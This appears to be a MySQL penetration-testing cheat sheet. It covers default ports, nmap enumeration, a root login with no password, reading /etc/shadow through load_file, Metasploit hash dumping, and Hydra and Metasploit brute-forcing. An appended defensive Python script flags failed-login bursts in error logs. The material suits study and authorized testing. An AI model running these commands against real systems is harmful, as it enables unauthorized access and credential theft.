Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.
Relational databases default ports
| Database | Port(s) |
| --- | --- |
| MaxDB | 7210 |
| MySQL | 3306 |
| Oracle DB | 1521, 1830 |
| PostgreSQL | 5432 |
| SQL Server (MSSQL) | 1433, 1434 |
NoSQL databases and other data stores default ports
| Database | Port(s) |
| --- | --- |
| Cassandra | 7000, 7001, 9042 |
| CouchDB | 5984 |
| Elasticsearch | 9200, 9300 |
| MongoDB | 27017, 27018, 27019, 28017 |
| Neo4J | 7473, 7474 |
| Redis | 6379 |
Enum
# Default scan
nmap $IP -sV -p 3306
# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password
# Get MySQL info
nmap $IP -sV -p 3306 --script=mysql-info
# Get MySQL users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
# Get MySQL databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
# Get MySQL variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"
# MySQL audit (CIS benchmark checks)
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
# Try to connect directly without a password
mysql -h $IP -u root
# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"
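# Metasploit way (writable directories check; dir_list is an option of this module)
msfconsole
use auxiliary/scanner/mysql/mysql_writable_dirs
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run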
## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump
setg rhosts $IP
set username root
set password ""
run
Manipulate local files via db
# connect to instance
mysql -h $IP -u root
# read local file
select load_file("/etc/shadow");
Bruteforce
# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run
# Hydra
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql
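Defender-side view of the login attempts above, as an added example that is not part of the original page: a sliding-window detector for bursts of failed logins and password-less attempts in the MySQL error log. The log lines are constructed samples; the function name `analyze`, the threshold and the window are assumptions, and the server is assumed to run with `log_error_verbosity=3` so that denied logins are recorded.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in MySQL 8 error-log format (not taken from a real server).
SAMPLE_LOG = """\
2024-05-01T09:59:00.000000Z 0 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections.
2024-05-01T10:00:01.000000Z 11 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: NO)
2024-05-01T10:00:02.000000Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: YES)
2024-05-01T10:00:03.000000Z 13 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: YES)
2024-05-01T10:00:04.000000Z 14 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: YES)
2024-05-01T10:00:05.000000Z 15 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: YES)
2024-05-01T10:00:06.000000Z 16 [Note] [MY-010926] [Server] Access denied for user 'root'@'203.0.113.7' (using password: YES)
2024-05-01T10:03:00.000000Z 17 [Note] [MY-010926] [Server] Access denied for user 'app'@'198.51.100.20' (using password: YES)
2024-05-01T10:20:00.000000Z 18 [Note] [MY-010926] [Server] Access denied for user 'app'@'198.51.100.20' (using password: YES)
"""

DENIED = re.compile(
    r"^(?P<ts>\S+) .*Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"

def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return failed-login bursts and password-less attempts per (host, user)."""
    recent = defaultdict(deque)          # (host, user) -> timestamps inside the window
    bursts, no_password = {}, set()
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if not m:
            continue                     # startup messages, warnings, etc.
        key = (m["host"], m["user"])
        if m["pw"] == "NO":
            no_password.add(key)         # client tried to log in with an empty password
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:        # drop denials older than the window
            q.popleft()
        if len(q) >= threshold:
            bursts[key] = max(bursts.get(key, 0), len(q))
    return {"bursts": bursts, "no_password": no_password}

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A successful login with an empty password produces no "Access denied" line, so this check complements, rather than replaces, auditing accounts for empty passwords on the server itself.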